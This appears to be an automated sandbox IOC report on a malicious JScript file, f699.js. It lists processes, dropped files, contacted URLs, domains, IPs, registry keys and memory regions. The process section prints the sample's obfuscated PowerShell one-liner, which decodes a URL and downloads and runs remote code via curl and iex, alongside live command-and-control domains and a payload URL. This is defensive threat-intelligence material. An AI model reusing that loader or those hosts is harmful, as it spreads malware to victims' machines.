IOC Report
f699.js

loading gif

Files

File Path
Type
Category
Malicious
f699.js
Unicode text, UTF-16, little-endian text, with very long lines (1373)
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3mn3us3.kz4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iohiyljz.y21.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jizrjkio.ryj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzftwxy2.15e.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
malicious
C:\Windows\System32\conhost.exe
conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://temp.sh
unknown
http://nuget.org/NuGet.exe
unknown
http://www.microsoft.c9t
unknown
http://isyzgez.top/1.php?s=mints1
192.153.57.159
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://temp.sh
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://temp.sh/bfseS/ruzxs.exe
51.91.79.17
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://mknjddllgakhaje.top
unknown
https://aka.ms/pscore68
unknown
http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://isyzgez.top
unknown
http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1
164.90.149.198
There are 11 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
temp.sh
51.91.79.17
isyzgez.top
192.153.57.159
mknjddllgakhaje.top
164.90.149.198

IPs

IP
Domain
Country
Malicious
192.153.57.159
isyzgez.top
United States
51.91.79.17
temp.sh
France
164.90.149.198
mknjddllgakhaje.top
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
237DC9F6000
heap
page read and write
237DA73F000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1B32C320000
heap
page read and write
237DCB3D000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
237DCAE5000
heap
page read and write
B49C5FE000
stack
page read and write
237DA721000
heap
page read and write
237DC6C5000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
237DA74E000
heap
page read and write
237DA759000
heap
page read and write
7DF4C4300000
trusted library allocation
page execute and read and write
1B3464F0000
heap
page read and write
237DCADD000
heap
page read and write
1B34635D000
heap
page read and write
50145FE000
stack
page read and write
237DA759000
heap
page read and write
237DA73D000
heap
page read and write
237DCB54000
heap
page read and write
1B330206000
trusted library allocation
page read and write
1B32DE60000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
237DCAB6000
heap
page read and write
7FFD9BBC4000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
237DA75D000
heap
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
7FFD9B79B000
trusted library allocation
page read and write
5015C4D000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1B34657A000
heap
page read and write
1B32DE00000
heap
page execute and read and write
7FFD9B931000
trusted library allocation
page read and write
237DA9AB000
heap
page read and write
237DCA1E000
heap
page read and write
5014FBC000
stack
page read and write
237DCB09000
heap
page read and write
1B32C35D000
heap
page read and write
1B3303B5000
trusted library allocation
page read and write
1B32C2C0000
heap
page readonly
1B34668A000
heap
page read and write
237DCA13000
heap
page read and write
5014CB9000
stack
page read and write
237DA72B000
heap
page read and write
237DA750000
heap
page read and write
237DCCE9000
heap
page read and write
1B32C359000
heap
page read and write
237DC9E3000
heap
page read and write
5015A0F000
stack
page read and write
237DC805000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
237DC9F6000
heap
page read and write
B49CAFF000
stack
page read and write
237DCADD000
heap
page read and write
237DCAF1000
heap
page read and write
1B32DDC5000
heap
page read and write
237DA8A0000
heap
page read and write
237DC9E7000
heap
page read and write
237DC9EB000
heap
page read and write
237DC9F3000
heap
page read and write
237DA751000
heap
page read and write
237DA742000
heap
page read and write
237DA9AC000
heap
page read and write
1B330264000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1B32C30F000
heap
page read and write
237DCB37000
heap
page read and write
1B3466FA000
heap
page read and write
7FFD9B969000
trusted library allocation
page read and write
1B32C250000
heap
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
237DCA13000
heap
page read and write
237DA742000
heap
page read and write
237DCAF2000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
237DCB1D000
heap
page read and write
237DA750000
heap
page read and write
237DCB37000
heap
page read and write
1B346500000
heap
page read and write
5015E4B000
stack
page read and write
237DCAEA000
heap
page read and write
50149FF000
stack
page read and write
7FFD9BB00000
trusted library allocation
page read and write
237DC9FC000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1B32C2D0000
heap
page read and write
237DCB09000
heap
page read and write
1B3301A3000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1B32F719000
trusted library allocation
page read and write
5014B78000
stack
page read and write
5015BCC000
stack
page read and write
1B32C516000
heap
page execute and read and write
1B32C357000
heap
page read and write
5014BBE000
stack
page read and write
1B32DE50000
trusted library allocation
page read and write
237DCA0C000
heap
page read and write
1B32C3D0000
trusted library allocation
page read and write
1B32C2F7000
heap
page read and write
1B33E073000
trusted library allocation
page read and write
237DA9A5000
heap
page read and write
5014D3E000
stack
page read and write
237DCB37000
heap
page read and write
1B32C31E000
heap
page read and write
237DCAE8000
heap
page read and write
1B32C314000
heap
page read and write
237DCADE000
heap
page read and write
50148FE000
stack
page read and write
237DCA91000
heap
page read and write
237DA6FF000
heap
page read and write
237DA761000
heap
page read and write
237DA9AE000
heap
page read and write
237DCA5E000
heap
page read and write
237DA74A000
heap
page read and write
237DA72D000
heap
page read and write
237DCADE000
heap
page read and write
237DCA2E000
heap
page read and write
B49CCFE000
stack
page read and write
5015D4D000
stack
page read and write
1B330097000
trusted library allocation
page read and write
237DCB0E000
heap
page read and write
237DA75A000
heap
page read and write
237DCAFF000
heap
page read and write
1B34662A000
heap
page read and write
237DCAE0000
heap
page read and write
237DA9AC000
heap
page read and write
1B32DEEF000
trusted library allocation
page read and write
237DA721000
heap
page read and write
1B32FBCF000
trusted library allocation
page read and write
237DCB1D000
heap
page read and write
5015A8D000
stack
page read and write
237DCA76000
heap
page read and write
1B33E15D000
trusted library allocation
page read and write
237DCB09000
heap
page read and write
237DA75E000
heap
page read and write
1B32C555000
heap
page read and write
1B32FB37000
trusted library allocation
page read and write
237DCA3A000
heap
page read and write
237DCB11000
heap
page read and write
1B33E07B000
trusted library allocation
page read and write
237DCADD000
heap
page read and write
1B32F9D2000
trusted library allocation
page read and write
237DA75F000
heap
page read and write
1B3466C0000
heap
page read and write
237DC9F6000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page execute and read and write
7FFD9BB70000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
1B32C110000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
1B346900000
heap
page read and write
237DCB2E000
heap
page read and write
7FFD9BC00000
trusted library allocation
page execute and read and write
5015DCB000
stack
page read and write
237DCA42000
heap
page read and write
237DCAF6000
heap
page read and write
5014DBE000
stack
page read and write
237DCAF9000
heap
page read and write
237DA721000
heap
page read and write
237DCA91000
heap
page read and write
237DA75E000
heap
page read and write
237DCADA000
heap
page read and write
5014E3E000
stack
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1B32F9D5000
trusted library allocation
page read and write
1B32DE71000
trusted library allocation
page read and write
237DCB16000
heap
page read and write
1B33E04C000
trusted library allocation
page read and write
237DCAEE000
heap
page read and write
237DCAE2000
heap
page read and write
5014EB8000
stack
page read and write
1B3466C9000
heap
page read and write
237DA749000
heap
page read and write
1B3466D6000
heap
page read and write
1B32C530000
heap
page execute and read and write
1B32DD0A000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
237DCA6A000
heap
page read and write
237DCB54000
heap
page read and write
B49C9FF000
stack
page read and write
1B32C330000
heap
page read and write
B49C6FE000
stack
page read and write
7FFD9B784000
trusted library allocation
page read and write
237DCADE000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
237DA9AA000
heap
page read and write
1B33DE71000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
237DCA51000
heap
page read and write
1B32FBAF000
trusted library allocation
page read and write
7FFD9B7AB000
trusted library allocation
page execute and read and write
237DCB39000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1B32DD40000
heap
page read and write
1B34637D000
heap
page read and write
237DCB00000
heap
page read and write
1B33E17B000
trusted library allocation
page read and write
1B32C290000
trusted library allocation
page read and write
237DCAF7000
heap
page read and write
1B32C2E2000
heap
page read and write
1B33DEE2000
trusted library allocation
page read and write
237DCA91000
heap
page read and write
1B32C400000
trusted library allocation
page read and write
237DCB2E000
heap
page read and write
237DA759000
heap
page read and write
237DCA3D000
heap
page read and write
237DA9AE000
heap
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
237DA726000
heap
page read and write
1B32C510000
heap
page execute and read and write
7FFD9B965000
trusted library allocation
page read and write
237DCAF2000
heap
page read and write
237DCA4E000
heap
page read and write
1B32C455000
heap
page read and write
237DC581000
heap
page read and write
237DCB38000
heap
page read and write
237DCB3D000
heap
page read and write
237DCB18000
heap
page read and write
237DA6A0000
heap
page read and write
237DCB08000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page execute and read and write
237DCB29000
heap
page read and write
237DA721000
heap
page read and write
1B32C312000
heap
page read and write
237DCB3D000
heap
page read and write
1B32C210000
heap
page read and write
237DCB15000
heap
page read and write
1B34652C000
heap
page read and write
5014573000
stack
page read and write
1B32DD91000
heap
page read and write
237DC801000
heap
page read and write
237DA704000
heap
page read and write
237DA70E000
heap
page read and write
237DCA26000
heap
page read and write
237DCA13000
heap
page read and write
1B32C450000
heap
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
237DCA76000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
237DCA3D000
heap
page read and write
1B32FBCB000
trusted library allocation
page read and write
1B33E16B000
trusted library allocation
page read and write
237DCB02000
heap
page read and write
1B32C3C8000
heap
page read and write
237DCADD000
heap
page read and write
237DCADD000
heap
page read and write
237DCAF4000
heap
page read and write
1B32F9E7000
trusted library allocation
page read and write
237DA6D8000
heap
page read and write
1B3466EE000
heap
page read and write
1B32DD3E000
heap
page read and write
501598E000
stack
page read and write
237DA900000
heap
page read and write
237DCB1D000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
237DCA82000
heap
page read and write
7FFD9BC63000
trusted library allocation
page read and write
237DA6F1000
heap
page read and write
5015B4F000
stack
page read and write
1B346682000
heap
page read and write
237DCA04000
heap
page read and write
237DCAF8000
heap
page read and write
237DCB13000
heap
page read and write
237DCAF2000
heap
page read and write
1B32FD1E000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
237DCB54000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page execute and read and write
237DCAE1000
heap
page read and write
1B33E071000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
237DCB00000
heap
page read and write
237DC80A000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
237DA744000
heap
page read and write
237DA6EC000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
237DA731000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
237DCAA6000
heap
page read and write
237DA9AE000
heap
page read and write
237DCAFA000
heap
page read and write
237DA72F000
heap
page read and write
1B33E08B000
trusted library allocation
page read and write
237DA6FF000
heap
page read and write
237DCA3D000
heap
page read and write
1B32C2B0000
trusted library allocation
page read and write
5014AFA000
stack
page read and write
237DA9A0000
heap
page read and write
7DF4C4320000
trusted library allocation
page execute and read and write
237DCA3D000
heap
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
237DA756000
heap
page read and write
237DCA96000
heap
page read and write
1B345E7B000
heap
page read and write
237DCAE8000
heap
page read and write
237DCB08000
heap
page read and write
237DCA46000
heap
page read and write
B49C8FF000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
237DCB2E000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
237DCAF7000
heap
page read and write
237DCADE000
heap
page read and write
1B32F9D0000
trusted library allocation
page read and write
237DC9E1000
heap
page read and write
1B32F38B000
trusted library allocation
page read and write
5014C37000
stack
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
237DA742000
heap
page read and write
237DA6FE000
heap
page read and write
237DCA16000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1B33027D000
trusted library allocation
page read and write
237DCA51000
heap
page read and write
237DC9F8000
heap
page read and write
501487E000
stack
page read and write
237DCA3D000
heap
page read and write
237DCAC6000
heap
page read and write
237DA9AE000
heap
page read and write
1B32E093000
trusted library allocation
page read and write
B49CBFE000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
237DC9F6000
heap
page read and write
1B32C1F0000
heap
page read and write
237DA75B000
heap
page read and write
237DCA13000
heap
page read and write
237DCAFF000
heap
page read and write
7FFD9BBDC000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1B32C45C000
heap
page read and write
1B346375000
heap
page read and write
237DA9AD000
heap
page read and write
5014F3D000
stack
page read and write
237DCB1D000
heap
page read and write
237DA6D0000
heap
page read and write
237DCB21000
heap
page read and write
237DC9F6000
heap
page read and write
1B32C550000
heap
page read and write
237DCB09000
heap
page read and write
237DA761000
heap
page read and write
237DC9EF000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9BBC9000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
237DCAE1000
heap
page read and write
237DCB1D000
heap
page read and write
237DA750000
heap
page read and write
237DA6F8000
heap
page read and write
237DA705000
heap
page read and write
237DCB3E000
heap
page read and write
237DA73C000
heap
page read and write
1B3465C9000
heap
page read and write
5015CCC000
stack
page read and write
1B34660D000
heap
page read and write
237DCB0F000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1B32C440000
trusted library allocation
page read and write
237DCA91000
heap
page read and write
1B3465BF000
heap
page read and write
1B32DD00000
heap
page read and write
1B33017D000
trusted library allocation
page read and write
237DCB54000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
5014D37000
stack
page read and write
1B32E98B000
trusted library allocation
page read and write
237DCADE000
heap
page read and write
237DCADE000
heap
page read and write
237DA6F1000
heap
page read and write
237DA742000
heap
page read and write
B49C4F9000
stack
page read and write
237DCB54000
heap
page read and write
237DCB28000
heap
page read and write
237DCB0A000
heap
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
7FFD9BAF0000
trusted library allocation
page read and write
237DA70F000
heap
page read and write
237DC58B000
heap
page read and write
237DCB05000
heap
page read and write
7FFD9B782000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
237DCB1D000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
1B32F9CE000
trusted library allocation
page read and write
237DCB39000
heap
page read and write
237DCA91000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
237DCA56000
heap
page read and write
7FFD9BB20000
trusted library allocation
page execute and read and write
7FFD9B830000
trusted library allocation
page read and write
1B346603000
heap
page read and write
237DCB23000
heap
page read and write
237DA727000
heap
page read and write
1B346350000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
237DCB1D000
heap
page read and write
237DA690000
heap
page read and write
1B346686000
heap
page read and write
237DCAE8000
heap
page read and write
237DC9F6000
heap
page read and write
237DCB19000
heap
page read and write
237DA721000
heap
page read and write
237DCADE000
heap
page read and write
237DC9E0000
heap
page read and write
501497A000
stack
page read and write
237DCB01000
heap
page read and write
5014A7D000
stack
page read and write
237DCB0F000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
237DA742000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9BBD8000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
237DA6F9000
heap
page read and write
1B32DDD7000
heap
page read and write
7FFD9BBA3000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1B32FBBE000
trusted library allocation
page read and write
7DF4C4310000
trusted library allocation
page execute and read and write
5015ACF000
stack
page read and write
There are 421 hidden memdumps, click here to show them.